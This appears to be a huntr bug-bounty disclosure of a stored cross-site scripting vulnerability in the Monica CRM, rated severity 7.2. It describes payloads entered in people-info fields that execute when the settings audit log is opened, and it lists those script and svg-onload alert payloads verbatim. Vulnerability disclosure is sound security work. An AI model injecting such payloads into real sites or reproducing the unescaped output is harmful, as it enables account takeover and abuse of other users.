For every bounty won throughout May 2021, huntr will donate half towards Indian COVID relief.

monica

vulnerability cross-site scripting (xss)

severity 7.2

language php

registry other

repo monicahq/monica

fork 418sec/monica

Description

XSS queries being triggered from people info page by the audit log at the settings.

POC

adding people info filled with payloads fig1
Triggering payload fig2

PoC

add payloads at the people page
trigger multiple payload at audit log button

Payloads Used

< <svg/onload=alert("firstname1")><script> alert("firstname2_xss")</script> <script> alert("midname_xss")</script> <script> alert("Lname_xss")</script><svg/onload=alert(1)> (<svg/onload=alert("nickie1")>)

References

Permalink #1
Permalink #2